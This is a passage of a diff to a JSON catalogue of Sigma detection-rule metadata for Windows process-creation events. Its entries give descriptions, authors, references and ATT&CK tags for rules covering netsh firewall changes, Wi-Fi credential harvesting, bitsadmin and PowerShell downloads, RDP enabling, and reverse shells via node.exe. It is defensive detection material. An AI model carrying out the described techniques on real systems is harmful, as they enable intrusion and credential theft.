"falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + ], + "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1564.004" ] }, - "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", - "value": "Netsh Port or Application Allowed" + "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", + "value": "Use Short Name Path in Command Line" }, { - "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/05/25", + "author": "frack113", + "creation_date": "2022/09/25", "falsepositive": [ - "Legitimate administration" + "Legitimate use" ], - "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", + "filename": "proc_creation_win_ultraviewer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", + "value": "Use of UltraViewer Remote Access Software" + }, + { + "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_cmd_read_contents.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", + "value": "Read and Execute a File Via Cmd.exe" + }, + { + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virusradar.com/en/Win32_Kasidet.AD/description", - "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ] }, - "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", - "value": "Netsh Program Allowed with Suspcious Location" + "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "value": "Bitsadmin Download File with Suspicious Extension" + }, + { + "description": "Detects usage of wmic to start or stop a service", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "value": "WMIC Service Start/Stop" + }, + { + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "value": "Suspicious Invoke-WebRequest Usage" + }, + { + "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys", + "meta": { + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_enable_rdp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" + ] + }, + "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", + "value": "Enabling RDP Service via Reg.exe" }, { "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", @@ -43045,316 +36049,128 @@ "value": "Netsh Firewall Rule Deletion" }, { - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "description": "Detects suspicious process that use escape characters", "meta": { - "author": "frack113", - "creation_date": "2022/01/09", + "author": "juju4", + "creation_date": "2018/12/11", "falsepositive": [ - "Legitimate administration" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", - "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" - }, - { - "description": "Detects capture a network trace via netsh.exe trace functionality", - "meta": { - "author": "Kutepov Anton, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" - ], - "filename": "proc_creation_win_netsh_packet_capture.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ] - }, - "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", - "value": "Capture a Network Trace with netsh.exe" - }, - { - "description": "Detects netsh commands that configure a port forwarding (PortProxy)", - "meta": { - "author": "Florian Roth, omkar72, oscd.community", - "creation_date": "2019/01/29", - "falsepositive": [ - "Legitimate administration", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" - ], - "filename": "proc_creation_win_netsh_port_fwd.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://adepts.of0x.cc/netsh-portproxy-code/", - "https://www.dfirnotes.net/portproxy_detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "value": "Netsh Port Forwarding" - }, - { - "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", - "meta": { - "author": "Florian Roth, oscd.community", - "creation_date": "2019/01/29", - "falsepositive": [ - "Legitimate administration" - ], - "filename": "proc_creation_win_netsh_port_fwd_3389.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "value": "Netsh RDP Port Forwarding" - }, - { - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "meta": { - "author": "Andreas Hunkeler (@Karneades), oscd.community", - "creation_date": "2020/04/20", - "falsepositive": [ - "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" - ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ] - }, - "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", - "value": "Harvesting of Wifi Credentials Using netsh.exe" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/25", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_netsupport.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", - "value": "Use of NetSupport Remote Access Software" - }, - { - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", - "meta": { - "author": "frack113", - "creation_date": "2022/03/12", - "falsepositive": [ - "Legitimate script" - ], - "filename": "proc_creation_win_network_scan_loop.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://ss64.com/nt/for.html", - "https://ss64.com/ps/foreach-object.htmll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", - "value": "Suspicious Scan Loop Network" - }, - { - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Admin activity" - ], - "filename": "proc_creation_win_network_sniffing.yml", + "filename": "proc_creation_win_susp_cli_escape.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://twitter.com/vysecurity/status/885545634958385153", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://twitter.com/Hexacorn/status/885570278637678592", + "https://twitter.com/Hexacorn/status/885553465417756673", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" ], "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.defense_evasion", + "attack.t1140" ] }, - "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", - "value": "Network Sniffing" + "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "value": "Suspicious Commandline Escape" }, { - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/01", + "creation_date": "2022/08/19", "falsepositive": [ - "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml", + "filename": "proc_creation_win_lolbin_presentationhost_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "value": "Download Arbitrary Files Via PresentationHost.exe" + }, + { + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_image_missing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" ], "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion" ] }, - "uuid": "5b768e71-86f2-4879-b448-81061cbae951", - "value": "Suspicious Manipulation Of Default Accounts" + "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", + "value": "Execution Of Non-Existing File" }, { - "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "meta": { - "author": "Endgame, JHasenbusch (ported for oscd.community)", - "creation_date": "2018/10/30", + "author": "Florian Roth", + "creation_date": "2022/10/10", "falsepositive": [ - "Legitimate use of net.exe utility by legitimate user" + "Sometimes used by developers or system administrators for debugging purposes" ], - "filename": "proc_creation_win_net_enum.yml", - "level": "low", + "filename": "proc_creation_win_susp_process_hacker.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" + "https://processhacker.sourceforge.io/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://github.com/winsiderss/systeminformer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] + "tags": "No established tags" }, - "uuid": "62510e69-616b-4078-b371-847da438cc03", - "value": "Windows Network Enumeration" + "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", + "value": "Process Hacker / System Informer Usage" }, { - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", "meta": { - "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali", - "creation_date": "2019/01/16", + "author": "Teymur Kheirkhabarov", + "creation_date": "2019/10/26", "falsepositive": [ - "Inventory tool runs", - "Administrative activity" + "Unknown" ], - "filename": "proc_creation_win_net_recon.yml", - "level": "medium", + "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" + "attack.privilege_escalation", + "attack.t1574.011" ] }, - "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", - "value": "Suspicious Reconnaissance Activity Using Net" - }, - { - "description": "Identifies creation of local users via the net.exe command.", - "meta": { - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", - "creation_date": "2018/10/30", - "falsepositive": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." - ], - "filename": "proc_creation_win_net_user_add.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ] - }, - "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "value": "Net.exe User Account Creation" + "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "value": "Possible Privilege Escalation via Service Permissions Weakness" }, { "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", @@ -43381,505 +36197,908 @@ "value": "Net.exe User Account Creation - Never Expire" }, { - "description": "Detects when an admin share is mounted using net.exe", - "meta": { - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", - "creation_date": "2020/10/05", - "falsepositive": [ - "Administrators" - ], - "filename": "proc_creation_win_net_use_admin_share.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", - "value": "Mounted Windows Admin Shares with net.exe" - }, - { - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/23", - "falsepositive": [ - "Other legitimate network providers used and not filtred in this rule" - ], - "filename": "proc_creation_win_new_network_provider.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", - "value": "New Network Provider - CommandLine" - }, - { - "description": "Detects creation of a new service.", - "meta": { - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate administrator or user creates a service for legitimate reasons." - ], - "filename": "proc_creation_win_new_service_creation.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", - "value": "New Service Creation" - }, - { - "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/28", - "falsepositive": [ - "Legitimate use of Nim on developer systems" - ], - "filename": "proc_creation_win_nimgrab.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", - "value": "Nimgrab File Download" - }, - { - "description": "Detects nltest commands that can be used for information discovery", - "meta": { - "author": "Craig Young, oscd.community, Georg Lauenstein", - "creation_date": "2021/07/24", - "falsepositive": [ - "Legitimate administration use but user must be check out" - ], - "filename": "proc_creation_win_nltest_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", - "https://attack.mitre.org/techniques/T1482/", - "https://attack.mitre.org/techniques/T1016/", - "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" - ] - }, - "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", - "value": "Recon Activity with NLTEST" - }, - { - "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_node_abuse.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", - "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", - "https://nodejs.org/api/cli.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", - "value": "Node.exe Process Abuse" - }, - { - "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", - "creation_date": "2019/09/12", - "falsepositive": [ - "Legitimate programs executing PowerShell scripts" - ], - "filename": "proc_creation_win_non_interactive_powershell.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f4bbd493-b796-416e-bbf2-121235348529", - "value": "Non Interactive PowerShell" - }, - { - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", - "creation_date": "2020/10/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_non_priv_reg_or_ps.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", - "value": "Non-privileged Usage of Reg or Powershell" - }, - { - "description": "Detects the use of NPS a port forwarding tool", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", "meta": { "author": "Florian Roth", - "creation_date": "2022/10/08", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_nps.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/ehang-io/nps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", - "value": "NPS Tunneling Tool" - }, - { - "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/05", + "creation_date": "2022/01/14", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1566489367232651264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" ], "tags": [ "attack.defense_evasion" ] }, - "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", - 